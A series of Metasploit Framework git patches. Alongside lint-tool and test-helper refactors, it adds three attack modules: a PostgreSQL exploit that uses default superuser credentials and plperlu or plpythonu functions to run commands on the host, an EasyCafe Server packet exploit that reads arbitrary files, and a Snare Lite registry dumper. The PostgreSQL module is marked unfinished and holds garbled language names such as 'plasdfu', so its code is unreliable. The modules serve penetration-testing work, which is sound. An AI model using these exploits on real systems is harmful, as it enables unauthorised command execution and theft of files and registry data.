end -# -# Run all the msftidy checks. -# -# @param full_filepath [String] The full file path to check -# @return status [Integer] A status code suitable for use as an exit status -def run_checks(full_filepath) - tidy = Msftidy.new(full_filepath) - tidy.check_mode - tidy.check_shebang - tidy.check_nokogiri - tidy.check_rubygems - tidy.check_ref_identifiers - tidy.check_old_keywords - tidy.check_verbose_option - tidy.check_badchars - tidy.check_extname - tidy.check_old_rubies - tidy.check_ranking - tidy.check_disclosure_date - tidy.check_title_casing - tidy.check_bad_terms - tidy.check_bad_super_class - tidy.check_function_basics - tidy.check_lines - tidy.check_snake_case_filename - tidy.check_comment_splat - tidy.check_vuln_codes - tidy.check_vars_get - tidy.check_newline_eof - tidy.check_sock_get - tidy.check_udp_sock_get - tidy.check_invalid_url_scheme - tidy.check_print_debug - tidy.check_register_datastore_debug - tidy.check_use_datastore_debug - return tidy -end - ## # # Main program # ## -dirs = ARGV +if __FILE__ == $PROGRAM_NAME + dirs = ARGV -@exit_status = 0 + @exit_status = 0 -if dirs.length < 1 - $stderr.puts "Usage: #{File.basename(__FILE__)} " - @exit_status = 1 - exit(@exit_status) -end - -dirs.each do |dir| - begin - Find.find(dir) do |full_filepath| - next if full_filepath =~ /\.git[\x5c\x2f]/ - next unless File.file? full_filepath - next unless full_filepath =~ /\.rb$/ - msftidy = run_checks(full_filepath) - @exit_status = msftidy.status if (msftidy.status > @exit_status.to_i) - end - rescue Errno::ENOENT - $stderr.puts "#{File.basename(__FILE__)}: #{dir}: No such file or directory" + if dirs.length < 1 + $stderr.puts "Usage: #{File.basename(__FILE__)} " + @exit_status = 1 + exit(@exit_status) end -end -exit(@exit_status.to_i) + dirs.each do |dir| + begin + Find.find(dir) do |full_filepath| + next if full_filepath =~ /\.git[\x5c\x2f]/ + next unless File.file? full_filepath + next unless full_filepath =~ /\.rb$/ + msftidy = Msftidy.new(full_filepath) + msftidy.run_checks + @exit_status = msftidy.status if (msftidy.status > @exit_status.to_i) + end + rescue Errno::ENOENT + $stderr.puts "#{File.basename(__FILE__)}: #{dir}: No such file or directory" + end + end + + exit(@exit_status.to_i) +end From f029cd0c9abeff3a0debca1ad57262e991a2bec9 Mon Sep 17 00:00:00 2001 From: Jon Hart Date: Thu, 24 Dec 2015 10:54:51 -0800 Subject: [PATCH 167/686] Add common helpers for capturing stdout/stderr --- spec/spec_helper.rb | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) diff --git a/spec/spec_helper.rb b/spec/spec_helper.rb index d29e9fd1ac..aa531c81af 100644 --- a/spec/spec_helper.rb +++ b/spec/spec_helper.rb @@ -1,4 +1,6 @@ # -*- coding: binary -*- +require 'stringio' + ENV['RAILS_ENV'] = 'test' unless Bundler.settings.without.include?(:coverage) @@ -97,3 +99,25 @@ end Metasploit::Framework::Spec::Constants::Suite.configure! Metasploit::Framework::Spec::Threads::Suite.configure! + +def get_stdout(&block) + out = $stdout + $stdout = tmp = StringIO.new + begin + yield + ensure + $stdout = out + end + tmp.string +end + +def get_stderr(&block) + out = $stderr + $stderr = tmp = StringIO.new + begin + yield + ensure + $stderr = out + end + tmp.string +end From be84ed13a25a1f9846b0cdad389d452c251fb325 Mon Sep 17 00:00:00 2001 From: Jon Hart Date: Thu, 24 Dec 2015 10:55:13 -0800 Subject: [PATCH 168/686] Update msftidy spec to be more easily added to --- .../modules/auxiliary/auxiliary_untidy.rb | 2 ++ spec/tools/dev/msftidy_spec.rb | 36 +++++++++++++------ 2 files changed, 28 insertions(+), 10 deletions(-) diff --git a/spec/file_fixtures/modules/auxiliary/auxiliary_untidy.rb b/spec/file_fixtures/modules/auxiliary/auxiliary_untidy.rb index ddf7c73da2..b349619004 100644 --- a/spec/file_fixtures/modules/auxiliary/auxiliary_untidy.rb +++ b/spec/file_fixtures/modules/auxiliary/auxiliary_untidy.rb @@ -7,6 +7,8 @@ require 'msf/core' # XXX: invalid super class for an auxiliary module class Metasploit4 < Msf::Exploit + # XXX: auxiliary modules don't use Rank + Rank = LowRanking def initialize(info = {}) super( update_info( diff --git a/spec/tools/dev/msftidy_spec.rb b/spec/tools/dev/msftidy_spec.rb index c48c97c2b5..bf9f115f85 100644 --- a/spec/tools/dev/msftidy_spec.rb +++ b/spec/tools/dev/msftidy_spec.rb @@ -1,32 +1,48 @@ -RSpec.describe 'msftidy utility' do - let(:msftidy) { File.expand_path('tools/dev/msftidy.rb') } +require 'spec_helper' - it "shows Usage if invalid arguments are provided" do - expect { system(msftidy) }.to output(/Usage/).to_stderr_from_any_process - end +load Metasploit::Framework.root.join('tools/dev/msftidy.rb').to_path +RSpec.describe Msftidy do context "with a tidy auxiliary module" do let(:auxiliary_tidy) { File.expand_path('modules/auxiliary/auxiliary_tidy.rb', FILE_FIXTURES_PATH) } + let(:msftidy) { Msftidy.new(auxiliary_tidy) } + + before(:each) do + @msftidy_stdout = get_stdout { msftidy.run_checks } + end it "outputs nothing" do - expect { system("#{msftidy} #{auxiliary_tidy}") }.to_not output.to_stdout_from_any_process + expect(@msftidy_stdout).to be_empty end end context "with an untidy auxiliary module" do let(:auxiliary_untidy) { File.expand_path('modules/auxiliary/auxiliary_untidy.rb', FILE_FIXTURES_PATH) } + let(:msftidy) { Msftidy.new(auxiliary_untidy) } - it "outputs expected errors and warnings" do - expect { system("#{msftidy} #{auxiliary_untidy}") }.to \ - output(/ERROR.*Invalid super class for auxiliary module/).to_stdout_from_any_process + before(:each) do + @msftidy_stdout = get_stdout { msftidy.run_checks } + end + + it "ERRORs when invalid superclass" do + expect(@msftidy_stdout).to match(/ERROR.*Invalid super class for auxiliary module/) + end + + it "WARNINGs when specifying Rank" do + expect(@msftidy_stdout).to match(/WARNING.*Rank/) end end context "with a tidy payload module" do let(:payload_tidy) { File.expand_path('modules/payloads/payload_tidy.rb', FILE_FIXTURES_PATH) } + let(:msftidy) { Msftidy.new(payload_tidy) } + + before(:each) do + @msftidy_stdout = get_stdout { msftidy.run_checks } + end it "outputs nothing" do - expect { system("#{msftidy} #{payload_tidy}") }.to_not output.to_stdout_from_any_process + expect(@msftidy_stdout).to be_empty end end end From 46a3c839b45d69c32a258b1d5470ef890e2b52f3 Mon Sep 17 00:00:00 2001 From: Jon Hart Date: Thu, 24 Dec 2015 11:03:11 -0800 Subject: [PATCH 169/686] Refactor existing tests that had been duplicating get_std* --- .../msf/core/exploit/browser_autopwn2_spec.rb | 16 ++----------- spec/tools/egghunter_spec.rb | 14 +---------- spec/tools/md5_lookup_spec.rb | 12 +--------- spec/tools/msu_finder_spec.rb | 24 +------------------ spec/tools/virustotal_spec.rb | 13 ---------- 5 files changed, 5 insertions(+), 74 deletions(-) diff --git a/spec/lib/msf/core/exploit/browser_autopwn2_spec.rb b/spec/lib/msf/core/exploit/browser_autopwn2_spec.rb index 4efb6884b3..c4455a00a9 100644 --- a/spec/lib/msf/core/exploit/browser_autopwn2_spec.rb +++ b/spec/lib/msf/core/exploit/browser_autopwn2_spec.rb @@ -1,4 +1,5 @@ require 'msf/core' +require 'spec_helper' RSpec.describe Msf::Exploit::Remote::BrowserAutopwn2 do @@ -759,19 +760,6 @@ RSpec.describe Msf::Exploit::Remote::BrowserAutopwn2 do describe 'when outputing' do - # Get stdout: - # http://stackoverflow.com/questions/11349270/test-output-to-command-line-with-rspec - def get_stdout(&block) - out = $stdout - $stdout = fake = StringIO.new - begin - yield - ensure - $stdout = out - end - fake.string - end - before(:each) do allow(subject).to receive(:print_status) { |arg| $stdout.puts arg } allow(subject).to receive(:print_line) { |arg| $stdout.puts arg } @@ -873,4 +861,4 @@ RSpec.describe Msf::Exploit::Remote::BrowserAutopwn2 do end -end \ No newline at end of file +end diff --git a/spec/tools/egghunter_spec.rb b/spec/tools/egghunter_spec.rb index 9c6de9aafd..e029111ba9 100644 --- a/spec/tools/egghunter_spec.rb +++ b/spec/tools/egghunter_spec.rb @@ -1,6 +1,5 @@ load Metasploit::Framework.root.join('tools/exploit/egghunter.rb').to_path - -require 'stringio' +require 'spec_helper' RSpec.describe Egghunter do @@ -16,17 +15,6 @@ RSpec.describe Egghunter do describe '#run' do - def get_stdout(&block) - out = $stdout - $stdout = fake = StringIO.new - begin - yield - ensure - $stdout = out - end - fake.string - end - let(:default_opts) { { :platform => 'windows', :format => 'c', :eggtag => egg, :arch => 'x86' } } diff --git a/spec/tools/md5_lookup_spec.rb b/spec/tools/md5_lookup_spec.rb index 78cd2b85c0..76d9ba5d8d 100644 --- a/spec/tools/md5_lookup_spec.rb +++ b/spec/tools/md5_lookup_spec.rb @@ -1,4 +1,5 @@ load Metasploit::Framework.root.join('tools/password/md5_lookup.rb').to_path +require 'spec_helper' require 'rex/proto/http/response' require 'stringio' @@ -70,17 +71,6 @@ RSpec.describe Md5LookupUtility do end end - def get_stdout(&block) - out = $stdout - $stdout = fake = StringIO.new - begin - yield - ensure - $stdout = out - end - fake.string - end - # # Tests start here # diff --git a/spec/tools/msu_finder_spec.rb b/spec/tools/msu_finder_spec.rb index 9b93a5fdf7..2d882699d0 100644 --- a/spec/tools/msu_finder_spec.rb +++ b/spec/tools/msu_finder_spec.rb @@ -2,6 +2,7 @@ load Metasploit::Framework.root.join('tools/exploit/msu_finder.rb').to_path require 'nokogiri' require 'uri' +require 'spec_helper' RSpec.describe MicrosoftPatchFinder do @@ -60,29 +61,6 @@ RSpec.describe MicrosoftPatchFinder do end describe MicrosoftPatchFinder::Helper do - - def get_stdout(&block) - out = $stdout - $stdout = fake = StringIO.new - begin - yield - ensure - $stdout = out - end - fake.string - end - - def get_stderr(&block) - out = $stderr - $stderr = fake = StringIO.new - begin - yield - ensure - $stderr = out - end - fake.string - end - subject(:object_helper) do mod = Object.new mod.extend MicrosoftPatchFinder::Helper diff --git a/spec/tools/virustotal_spec.rb b/spec/tools/virustotal_spec.rb index 0a4572f504..cf12fd4f3f 100644 --- a/spec/tools/virustotal_spec.rb +++ b/spec/tools/virustotal_spec.rb @@ -172,19 +172,6 @@ RSpec.describe VirusTotalUtility do describe VirusTotalUtility::Driver do - # Get stdout: - # http://stackoverflow.com/questions/11349270/test-output-to-command-line-with-rspec - def get_stdout(&block) - out = $stdout - $stdout = fake = StringIO.new - begin - yield - ensure - $stdout = out - end - fake.string - end - before do $stdin = StringIO.new("Y\n") end From fa3431c7325ae80518645c8dcb7ae41a618ee204 Mon Sep 17 00:00:00 2001 From: Micheal Date: Sat, 26 Dec 2015 17:53:52 -0500 Subject: [PATCH 170/686] Pushing now. Still working on it. --- .../multi/postgres/postgres_createlang.rb | 301 ++++++++++++++++++ 1 file changed, 301 insertions(+) create mode 100644 modules/exploits/multi/postgres/postgres_createlang.rb diff --git a/modules/exploits/multi/postgres/postgres_createlang.rb b/modules/exploits/multi/postgres/postgres_createlang.rb new file mode 100644 index 0000000000..5fd7138121 --- /dev/null +++ b/modules/exploits/multi/postgres/postgres_createlang.rb @@ -0,0 +1,301 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'msf/core/exploit/postgres' + +class Metasploit4 < Msf::Exploit::Remote + Rank = GoodRanking + + include Msf::Exploit::Remote::Postgres + include Msf::Auxiliary::Report + + # Creates an instance of this module.
 + def initialize(info = {}) + super(update_info(info, + 'Name' => 'PostgreSQL CREATE LANGUAGE Execution', + 'Description' => %q{ + Some installations of Postgres are configured to allow loading external
 scripting languages. + Most commonly this is Perl and
 Python. When enabled, command execution is possible
 on the host. + To execute system commands, loading the "untrusted" version of the language is necessary. + This requires a superuser. This is usually postgres. The execution should be platform-agnostic, + and has been tested on OS X, Windows, and Linux. + + This module attempts to load Perl or Python to execute system
 commands. As this dynamically loads + a scripting language to execute commands,
 it is not necessary to drop a file on the filesystem.
 + }, + 'Author' => [ + 'Micheal Cottingham', # author of this module + 'midnitesnake', # the postgres_payload module that this is based on + ], + 'License' => MSF_LICENSE, + 'References' => [ + ['URL', 'http://www.postgresql.org/docs/current/static/sql-createlanguage.html'], + ['URL', 'http://www.postgresql.org/docs/current/static/plperl.html'], + ['URL', 'http://www.postgresql.org/docs/current/static/plpython.html'] + ], + 'Platform' => %w{python linux unix win osx}, + 'Payload' => { + 'PayloadType' => %w{python cmd} + }, + 'Arch' => [ARCH_CMD, ARCH_PYTHON], + 'Targets' => [ + ['Automatic', {}] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => '' + )) + + register_options([ + OptString.new('USERNAME', [true, 'The username to the service', 'postgres']), + OptString.new('PASSWORD', [true, 'The password to the service', 'postgres']) + ], self.class) + + deregister_options('SQL', 'RETURN_ROWSET', 'VERBOSE') + end + + def check + version = postgres_fingerprint + + if version[:auth] + return CheckCode::Appears + + else + print_error "Authentication failed. #{version[:preauth] || version[:unknown]}" + return CheckCode::Safe + end + end + + def exploit + version = do_login(username, password, database) + + case version + when :noauth; print_error 'Authentication failed.'; return + when :noconn; print_error 'Connection failed.'; return + + else + print_status("#{rhost}:#{rport} - #{version}") + end + + begin + func_name = Rex::Text.rand_text_alpha(10) + + load_perl = create_perl + + # Decision tree - not clean, but it works. + # If you have suggestions for improvement, please contact me on Github - @micheal + case load_perl + when 'exists' + print_status 'Perl is already loaded, continuing' + createPerlFunc(func_name) + + when 'loaded' + print_status 'Perl was successfully loaded, continuing' + createPerlFunc(func_name) + + when 'not_exists' + print_status 'Perl is not installed on the target, attempting Python2' + + load_python2, ver = create_python2 + + case load_python2 + when 'exists' + print_status 'Python2 is already loaded, continuing' + create_python_func(func_name, '') + + when 'loaded' + print_status 'Python2 was successfully loaded, continuing' + create_python_func(func_name, '') + + when 'not_exists' + print_status 'Python2 is not installed on the target, attempting Python3' + + load_python3 = create_python3 + + case load_python3 + when 'exists' + print_status 'Python3 is already loaded, continuing' + create_python_func(func_name, '3') + + when 'loaded' + print_status 'Python3 was successfully loaded, continuing' + create_python_func(func_name, '3') + + when 'not_exists' + print_error 'No suitable exploit path found, exiting' + return + end + end + end + + + selectQuery = postgres_query("SELECT exec_#{func_name}('#{payload.encoded.gsub("'", "''")}')") + + case selectQuery.keys[0] + when :conn_error + print_error "#{rhost}:#{rport} Postgres - Authentication failure, could not connect." + + when :sql_error + print_error "#{rhost}:#{rport} Postgres - #{selectQuery[:sql_error]}" + + when :complete + vprint_good "#{rhost}:#{rport} Postgres - Command complete." + end + + rescue RuntimeError => e + print_error "Failed to create UDF: #{e.class}: #{e}" + end + + postgres_logout if @postgres_conn + end + + def create_python2 + create = postgres_query("CREATE LANGUAGE plpythonasdfu") + + if(create.keys[0] == :sql_error) + matchExists = create[:sql_error].match(/language "plpythonu" already exists/m) + + if(matchExists) + return 'exists', '' + + else + #matchError = create[:sql_error].match(/could not access file/m) + matchError = create[:sql_error].match(/unsupported language/m) + + if(matchError) + # One more attempt + create2 = postgres_query("CREATE LANGUAGE plpythonu") + + matchError2 = create2[:sql_error].match(/could not access file/m) + + if(matchError2) + return 'not_exists' + + else + return 'loaded', '2' + end + end + end + + else + return 'loaded', '' + end + end + + def create_python3 + create = postgres_query("CREATE LANGUAGE plpython3u") + + if(create.keys[0] == :sql_error) + matchExists = create[:sql_error].match(/language "plpython3u" already exists/m) + + if(matchExists) + return 'exists' + + else + matchError = create[:sql_error].match(/could not access file/m) + + if(matchError) + return 'not_exists' + end + end + + else + return 'loaded' + end + end + + def create_python_func(name, version) + create_python_function = postgres_query( + "CREATE OR REPLACE FUNCTION exec_#{name}(c text) RETURNS void as $$" + + "import subprocess, shlex" + + "return subprocess.check_output(shlex.split(c))" + + "$$ LANGUAGE plpython#{version}u") + + case create_python_function.keys[0] + when :conn_error + print_error "#{rhost}:#{rport} Postgres - Authentication failure, could not connect." + + when :sql_error + print_error "#{rhost}:#{rport} Postgres - #{create_python_function[:sql_error]}" + + when :complete + print_good "#{rhost}:#{rport} Postgres - Command complete." + end + end + + def create_perl + create = postgres_query("CREATE LANGUAGE plasdfu", 50) + + if(create.keys[0] == :sql_error) + matchExists = create[:sql_error].match(/language "plperlu" already exists/m) + + if(matchExists) + return 'exists' + + else + matchError = create[:sql_error].match(/could not access file/m) + return 'not_exists' + + if(matchError) + return 'not_exists' + end + end + + else + return 'loaded' + end + end + + def createPerlFunc(name) + createPerlFunction = postgres_query( + "CREATE OR REPLACE FUNCTION exec_#{name}(text) RETURNS TEXT as $$" + + "return `$_[0]`;" + + "$$ LANGUAGE plperlu") + + case createPerlFunction.keys[0] + when :conn_error + print_error "#{rhost}:#{rport} Postgres - Authentication failure, could not connect." + + when :sql_error + print_error "#{rhost}:#{rport} Postgres - #{createPerlFunction[:sql_error]}" + + when :complete + print_good "#{rhost}:#{rport} Postgres - Command complete." + end + end + + # Authenticate to the postgres server.
 + # Returns the version from #postgres_fingerprint + def do_login(user=nil, pass=nil, database=nil) + begin + password = pass || postgres_password + + vprint_status("Trying #{user}:#{password}@#{rhost}:#{rport}/#{database}") + + result = postgres_fingerprint( + :db => database, + :username => user, + :password => password + ) + + if result[:auth] + report_service( + :host => rhost, + :port => rport, + :name => "postgres", + :info => result.values.first + ) + return result[:auth] + + else + print_status("Login failed, fingerprint is #{result[:preauth] || result[:unknown]}") + return :noauth + end + + rescue Rex::ConnectionError, Rex::Post::Meterpreter::RequestError + return :noconn + end + end +end From 47261c27d41f228d953e935d398634e034c23a6e Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Sun, 27 Dec 2015 12:00:50 +0000 Subject: [PATCH 171/686] Add EasyCafe Server Remote File Access module --- .../misc/easycafe_server_fileaccess.rb | 86 +++++++++++++++++++ 1 file changed, 86 insertions(+) create mode 100644 modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb diff --git a/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb b/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb new file mode 100644 index 0000000000..820dec0607 --- /dev/null +++ b/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb @@ -0,0 +1,86 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit4 < Msf::Auxiliary + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'EasyCafe Server Remote File Access', + 'Description' => %q{ + This module exploits a file retrieval vulnerability in + EasyCafe Server. The vulnerability can be triggered by + sending a specially crafted packet (opcode 0x43) to the + 831/TCP port. + This module has been successfully tested on EasyCafe Server + version 2.2.14 (Trial mode and Demo mode) on Windows XP SP3 + and Windows 7 SP1. + Note that the server will throw a popup messagebox if the + specified file does not exist. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'R-73eN', # Vulnerability Discovery + 'Brendan Coles ' # Metasploit module + ], + 'References' => + [ + [ 'EDB', '39102' ] + ] + )) + + register_options( + [ + Opt::RPORT(831), + OptString.new('FILEPATH', [true, 'The path of the file to download', 'C:\\WINDOWS\\system32\\drivers\\etc\\hosts']) + ], self.class) + end + + def run_host(ip) + if datastore['FILEPATH'].nil? || datastore['FILEPATH'].empty? + print_error('Please supply the name of the file you want to download') + return + end + + file_path = datastore['FILEPATH'] + packet = "\x43" + packet << file_path + packet << "\x00" * (255 - file_path.length) + packet << "\x01\x00\x00\x00\x01" + + vprint_status("#{peer} - Sending request (#{packet.length} bytes)") + connect + sock.put(packet) + res = sock.get(15) + disconnect + unless res + print_error("#{peer} - Unable to retrieve file due to a timeout.") + return + end + vprint_status("#{peer} - Received response (#{res.length} bytes)") + + # Extract file contents + # Content begins after \x00\x01 + contents = res.sub(/\A.*?\x00\x01/m, '').to_s + if contents.nil? || contents.empty? + print_error("#{peer} - Unexpected reply. Unable to extract contents") + return + end + print_status("#{peer} - File retrieved successfully (#{contents.length} bytes)!") + path = store_loot( + 'easycafe_server', + 'application/octet-stream', + ip, + contents, + File.basename(file_path) + ) + print_status("File saved in: #{path}") + end +end From ceef02e8b2a401b9b33fa4415c11fdde47dd0872 Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Mon, 28 Dec 2015 15:16:21 +0000 Subject: [PATCH 172/686] Add Snare Lite for Windows Registry Access module --- modules/auxiliary/gather/snare_registry.rb | 184 +++++++++++++++++++++ 1 file changed, 184 insertions(+) create mode 100644 modules/auxiliary/gather/snare_registry.rb diff --git a/modules/auxiliary/gather/snare_registry.rb b/modules/auxiliary/gather/snare_registry.rb new file mode 100644 index 0000000000..78a9fcd514 --- /dev/null +++ b/modules/auxiliary/gather/snare_registry.rb @@ -0,0 +1,184 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit4 < Msf::Auxiliary + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + + HttpFingerprint = { :pattern => [ /SNARE/ ] } + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Snare Lite for Windows Registry Access', + 'Description' => %q{ + This module uses the Registry Dump feature of the Snare Lite + for Windows service on 6161/TCP to retrieve the Windows registry. + The Dump Registry functionality is unavailable in Snare Enterprise. + + Note: The Dump Registry functionality accepts only one connected + client at a time. Requesting a large key/hive will cause the service + to become unresponsive until the server completes the request. + }, + 'Platform' => 'win', + 'Author' => [ 'Brendan Coles ' ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'URL', 'https://www.intersectalliance.com/wp-content/uploads/user_guides/Guide_to_Snare_for_Windows-4.2.pdf' ] + ], + 'Actions' => + [ + [ 'System Information', 'Description' => 'Retrieve information about the system' ], + [ 'Snare Information', 'Description' => 'Retrieve information about the Snare installation' ], + [ 'Dump Registry Key', 'Description' => 'Retrieve a specified registry key, including all sub-keys' ], + [ 'Dump Registry Hive', 'Description' => 'Retrieve a specified registry hive, including all sub-keys' ], + [ 'Dump Registry', 'Description' => 'Retrieve the entire Windows registry. (Note: this may take a while)' ] + ], + 'DefaultAction' => 'System Information' + )) + + register_options( + [ + Opt::RPORT(6161), + OptString.new('USERNAME', [ false, 'The username for Snare remote access', 'snare' ]), + OptString.new('PASSWORD', [ false, 'The password for Snare remote access', '' ]), + OptString.new('REG_KEY', [ false, 'The registry key to retrieve', 'HKLM\\HARDWARE\\DESCRIPTION\\System' ]), + OptString.new('REG_HIVE', [ false, 'The registry hive to retrieve', 'HKLM' ]), + OptInt.new('TIMEOUT', [true, 'Timeout in seconds for downloading each registry key/hive', 300]) + ], self.class) + end + + def run + case action.name + when 'System Information' + dump_key('HKLM\\HARDWARE\\DESCRIPTION\\System') + when 'Snare Information' + dump_key('HKLM\\Software\\InterSect Alliance') + when 'Dump Registry Key' + dump_key(datastore['REG_KEY']) + when 'Dump Registry Hive' + dump_hive(datastore['REG_HIVE']) + when 'Dump Registry' + dump_all + end + end + + # + # Retrieve the supplied registry key + # + def dump_key(reg_key) + if reg_key.nil? || reg_key.empty? + fail_with(Failure::BadConfig, "#{peer} - Please supply a valid key name") + end + hive = reg_key.split('\\').first + key = reg_key.split('\\')[1..-1].join('\\\\') + if key.nil? || key.empty? || hive !~ /\A[A-Z0-9_]+\z/i + fail_with(Failure::BadConfig, "#{peer} - Please supply a valid key name") + end + print_status("#{peer} - Retrieving registry key '#{hive}\\\\#{key}'...") + res = send_request_cgi({ + 'uri' => normalize_uri('RegDump'), + 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), + 'vars_get' => { + 'str_Base' => hive, + 'str_SubKey' => key + } + }, datastore['TIMEOUT']) + if !res + fail_with(Failure::Unreachable, "#{peer} - Connection failed") + elsif res.code && res.code == 401 + fail_with(Failure::NoAccess, "#{peer} - Authentication failed") + elsif res.code && res.code == 404 + fail_with(Failure::NotVulnerable, "#{peer} - Dump Registry feature is unavailable") + elsif res.code && res.code == 200 && res.body && res.body =~ /\AKEY: / + print_good("#{peer} - Retrieved key successfully (#{res.body.length} bytes)") + elsif res.code && res.code == 200 && res.body && res.body =~ /the supplied subkey cannot be found/ + fail_with(Failure::NotFound, "#{peer} - The supplied registry key does not exist") + else + fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected reply (#{res.body.length} bytes)") + end + path = store_loot( + 'snare.registry.key', + 'text/plain', + datastore['RHOST'], + res.body, + reg_key.gsub(/[^\w]/, '_').downcase + ) + print_good("File saved in: #{path}") + end + + # + # Retrieve the supplied registry hive + # + def dump_hive(hive) + if hive !~ /\A[A-Z0-9_]+\z/i + fail_with(Failure::BadConfig, "#{peer} - Please supply a valid hive name") + end + print_status("#{peer} - Retrieving registry hive '#{hive}' ...") + res = send_request_cgi({ + 'uri' => normalize_uri('RegDump'), + 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), + 'vars_get' => { 'str_Base' => hive } + }, datastore['TIMEOUT']) + if !res + fail_with(Failure::Unreachable, "#{peer} - Connection failed") + elsif res.code && res.code == 401 + fail_with(Failure::NoAccess, "#{peer} - Authentication failed") + elsif res.code && res.code == 404 + fail_with(Failure::NotVulnerable, "#{peer} - Dump Registry feature is unavailable") + elsif res.code && res.code == 200 && res.body && res.body =~ /\AKEY: / + print_good("#{peer} - Retrieved hive successfully (#{res.body.length} bytes)") + else + fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected reply (#{res.body.length} bytes)") + end + path = store_loot( + 'snare.registry.hive', + 'text/plain', + datastore['RHOST'], + res.body, + hive.gsub(/[^\w]/, '_').downcase + ) + print_good("File saved in: #{path}") + end + + # + # Retrieve list of registry hives + # + def retrieve_hive_list + hives = [] + print_status("#{peer} - Retrieving list of registry hives ...") + res = send_request_cgi( + 'uri' => normalize_uri('RegDump'), + 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) + ) + if !res + fail_with(Failure::Unreachable, "#{peer} - Connection failed") + elsif res.code && res.code == 401 + fail_with(Failure::NoAccess, "#{peer} - Authentication failed") + elsif res.code && res.code == 404 + fail_with(Failure::NotVulnerable, "#{peer} - Dump Registry feature is unavailable") + elsif res.code && res.code == 200 && res.body && res.body =~ /RegDump\?str_Base/ + hives = res.body.scan(%r{
  • }).flatten + vprint_good("#{peer} - Found #{hives.length} registry hives (#{hives.join(', ')})") + else + fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected reply (#{res.body.length} bytes)") + end + hives + end + + # + # Retrieve all registry hives + # + def dump_all + hives = retrieve_hive_list + if hives.nil? || hives.empty? + print_error("#{peer} - Found no registry hives") + return + end + hives.each { |hive| dump_hive(hive) } + end +end From 89d691de84695e49d6e65f1e08c54fc1474e864e Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Mon, 28 Dec 2015 21:26:10 +0100 Subject: [PATCH 173/686] first try in changing class names --- lib/msf/core/exploit/ftpserver.rb | 2 +- lib/msf/core/exploit/smb/server/share.rb | 4 +- lib/msf/core/module_manager/loading.rb | 2 +- lib/msf/core/modules/loader/base.rb | 59 ++++---------- .../metasploit_class_compatibility_error.rb | 14 ---- lib/msf/core/modules/namespace.rb | 76 ------------------- .../modules/version_compatibility_error.rb | 52 ------------- .../multi/http/joomla_http_header_rce.rb | 2 +- 8 files changed, 21 insertions(+), 190 deletions(-) delete mode 100644 lib/msf/core/modules/metasploit_class_compatibility_error.rb delete mode 100644 lib/msf/core/modules/namespace.rb delete mode 100644 lib/msf/core/modules/version_compatibility_error.rb diff --git a/lib/msf/core/exploit/ftpserver.rb b/lib/msf/core/exploit/ftpserver.rb index 41dea0f789..e1990f69ad 100644 --- a/lib/msf/core/exploit/ftpserver.rb +++ b/lib/msf/core/exploit/ftpserver.rb @@ -56,7 +56,7 @@ module Exploit::Remote::FtpServer # exists for the given command, returns a generic default response. # # @example Handle SYST requests - # class Metasploit4 < Msf::Exploit + # class Metasploit < Msf::Exploit # include Msf::Exploit::Remote::FtpServer # ... # def on_client_command_syst(cmd_conn, arg) diff --git a/lib/msf/core/exploit/smb/server/share.rb b/lib/msf/core/exploit/smb/server/share.rb index 1ddbdd4172..aaf949ef3b 100644 --- a/lib/msf/core/exploit/smb/server/share.rb +++ b/lib/msf/core/exploit/smb/server/share.rb @@ -17,7 +17,7 @@ module Msf # @example Use it from an Auxiliary module # require 'msf/core' # - # class Metasploit3 < Msf::Auxiliary + # class Metasploit < Msf::Auxiliary # # include Msf::Exploit::Remote::SMB::Server::Share # @@ -59,7 +59,7 @@ module Msf # @example Use it from an Exploit module # require 'msf/core' # - # class Metasploit3 < Msf::Exploit::Remote + # class Metasploit < Msf::Exploit::Remote # Rank = ExcellentRanking # # include Msf::Exploit::EXE diff --git a/lib/msf/core/module_manager/loading.rb b/lib/msf/core/module_manager/loading.rb index c5900bd15a..415107d82d 100644 --- a/lib/msf/core/module_manager/loading.rb +++ b/lib/msf/core/module_manager/loading.rb @@ -122,4 +122,4 @@ module Msf::ModuleManager::Loading count_by_type end -end \ No newline at end of file +end diff --git a/lib/msf/core/modules/loader/base.rb b/lib/msf/core/modules/loader/base.rb index 5f4586efd6..617e449efa 100644 --- a/lib/msf/core/modules/loader/base.rb +++ b/lib/msf/core/modules/loader/base.rb @@ -3,9 +3,7 @@ # Project # require 'msf/core/modules/loader' -require 'msf/core/modules/namespace' -require 'msf/core/modules/metasploit_class_compatibility_error' -require 'msf/core/modules/version_compatibility_error' +require 'msf/core/modules/error' # Responsible for loading modules for {Msf::ModuleManager}. # @@ -26,13 +24,10 @@ class Msf::Modules::Loader::Base Msf::MODULE_POST => 'post' } # This must calculate the first line of the NAMESPACE_MODULE_CONTENT string so that errors are reported correctly - NAMESPACE_MODULE_LINE = __LINE__ + 4 + NAMESPACE_MODULE_LINE = __LINE__ + 1 # By calling module_eval from inside the module definition, the lexical scope is captured and available to the code in # module_content. NAMESPACE_MODULE_CONTENT = <<-EOS - # ensure the namespace module can respond to checks during loading - extend Msf::Modules::Namespace - class << self # The loader that originally loaded this module # 